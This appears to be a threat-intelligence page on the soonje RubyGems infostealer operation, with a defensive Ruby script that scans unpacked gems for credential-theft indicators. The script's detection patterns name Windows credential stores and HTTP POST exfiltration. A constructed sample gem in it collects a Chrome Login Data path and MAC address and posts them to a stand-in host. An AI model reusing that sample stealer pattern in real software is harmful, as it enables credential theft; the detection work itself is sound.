Soonje RubyGems infostealer package operation
Malware Activity
Summary
The soonje package operation has spread malicious RubyGems that embed Windows infostealers, putting the accounts and related credentials of anyone who installs them at risk. Since March 2023, the actor has published 60 packages that were downloaded more than 275,000 times. The packages were marketed as automation tools for gray-hat marketers, but alongside the advertised functionality they siphoned usernames, passwords, and MAC addresses from the installing machine. Some packages remained live, so new installers continue to be exposed.
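The behaviour described above (a gem that ships working "marketing" code but also reads Windows credential stores, collects a MAC address, and posts the result somewhere) can be screened for before a gem is loaded. The script below is an added illustrative check written for this page, not code from the report or from the packages it describes: it scans the Ruby source of an unpacked gem (e.g. `gem unpack foo.gem` or the `gems/` directory of a bundle) for that combination of indicators and never evaluates the code. The indicator regexes and the two sample gem trees it builds are constructed for the example and are not IOCs from the report.

```ruby
require "tmpdir"
require "fileutils"

# Heuristic indicator classes (assumed for this example, not IOCs from the report).
# Each regex is matched line-by-line against Ruby source found inside a gem.
INDICATORS = {
  "windows_credential_path" => /APPDATA|LOCALAPPDATA|Login Data|Local State/i,
  "mac_address_collection"  => /\bgetmac\b|ipconfig\s+\/all|\bHWaddr\b|\bether\b/i,
  "obfuscated_eval"         => /eval\s*\(?\s*Base64\.(?:strict_)?decode64/,
  "install_time_execution"  => /\bextconf\.rb\b|Gem::Installer|post_install_message/,
  "exfil_http_post"         => /Net::HTTP\.post(?:_form)?|HTTParty\.post|Faraday\.post/,
}.freeze

# Scan every *.rb file under gem_dir and return findings as
# [relative_path, line_number, indicator_label]. Pure static matching.
def scan_gem_dir(gem_dir)
  findings = []
  Dir.glob(File.join(gem_dir, "**", "*.rb")).sort.each do |path|
    File.foreach(path).with_index(1) do |line, lineno|
      INDICATORS.each do |label, re|
        findings << [path.delete_prefix(gem_dir + "/"), lineno, label] if line.match?(re)
      end
    end
  end
  findings
end

# A single indicator (e.g. a Windows profile path) is common in legitimate
# tooling. The combination the report describes is credential-store access
# plus MAC collection plus an outbound POST, so that is what we alert on.
def suspicious?(findings)
  labels = findings.map { |f| f[2] }.uniq
  (labels & %w[windows_credential_path mac_address_collection]).size == 2 &&
    labels.include?("exfil_http_post")
end

# Build two constructed sample gem trees in a temp dir: one benign, one that
# mimics the "marketing tool with a stealer inside" pattern. Neither is real.
def build_sample_gems
  root = Dir.mktmpdir("gemscan")

  benign = File.join(root, "benign_gem", "lib")
  FileUtils.mkdir_p(benign)
  File.write(File.join(benign, "benign_gem.rb"), <<~RUBY)
    require "csv"
    module BenignGem
      def self.load(path)
        CSV.read(path, headers: true)
      end
    end
  RUBY

  bad = File.join(root, "marketing_tool", "lib")
  FileUtils.mkdir_p(bad)
  File.write(File.join(bad, "marketing_tool.rb"), <<~RUBY)
    require "net/http"
    require "json"
    module MarketingTool
      def self.collect
        db  = File.join(ENV["LOCALAPPDATA"].to_s, "Google/Chrome/User Data/Default/Login Data")
        mac = `getmac`.to_s
        { user: ENV["USERNAME"], db: db, mac: mac }
      end
      def self.report(payload)
        Net::HTTP.post(URI("http://example.invalid/collect"), JSON.dump(payload))
      end
    end
  RUBY

  root
end

if $PROGRAM_NAME == __FILE__
  root = build_sample_gems
  %w[benign_gem marketing_tool].each do |name|
    findings = scan_gem_dir(File.join(root, name))
    puts "#{name}: #{suspicious?(findings) ? 'SUSPICIOUS' : 'clean'} (#{findings.size} hits)"
    findings.each { |f, l, label| puts "  #{f}:#{l} #{label}" }
  end
end
```

Run it against a real unpacked gem with `scan_gem_dir("/path/to/unpacked/gem")`; treat `suspicious?` as a triage signal to read the flagged lines, not as a verdict, since the heuristics are intentionally narrow and an attacker can trivially rename or encode the strings.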
Related Happenings
Contagious Interview npm malicious package campaign
Campaign
First: 28.11.2025 18:18
Last: 28.11.2025 18:18
Sources 1
About this happening:
The **Contagious Interview** campaign expanded with **197 more malicious npm packages**, extending a supply-chain delivery route that targets **npm users and developers**. The pac...
Shanhai666 malicious NuGet package sabotage activity
Malware Activity
First: 07.11.2025 22:53
Last: 07.11.2025 22:53
Sources 1
About this happening:
**Nine malicious NuGet packages** published under **shanhai666** were found to contain dormant sabotage code that can disrupt **.NET database operations** and **Siemens S7 PLC com...
Typosquatted npm packages delivering a PyInstaller infostealer
Malware Activity
First: 30.10.2025 01:16
Last: 30.10.2025 01:16
Sources 1
About this happening:
**Ten malicious npm packages** impersonated popular libraries and delivered a **24 MB PyInstaller infostealer** to developers on **Windows, Linux, and macOS**. The packages used *...
Nethereum typosquatted NuGet package campaign with download inflation
Campaign
First: 22.10.2025 14:43
Last: 22.10.2025 14:43
Sources 1
About this happening:
**Typosquatted NuGet uploads** were used in a repeat campaign that tried to look popular enough to trick **developers** into installing a malicious dependency and exposing **crypt...
XCoderTools markets XWorm 6.0 lifetime access on cybercrime forums
Threat Actor Meta
First: 07.10.2025 13:36
Last: 07.10.2025 13:36
Sources 1
About this happening:
**XCoderTools** reemerged on **cybercrime forums** to sell **XWorm 6.0**, showing that the malware ecosystem still has active commercial demand. The build was priced at **$500** f...
Timeline
- 08.08.2025 23:47 · 1 article
Soonje RubyGems infostealer package operation
Initial Disclosure: The operation began in **March 2023** when **soonje** started publishing malicious **RubyGems** packages that posed as marketing automation tools. The packages also embedded **Windows infostealers**, turning a software-distribution channel into a credential-theft vector.
Sources:
- 60 RubyGems Packages Steal Data From Annoying Spammers — www.darkreading.com — 08.08.2025 23:47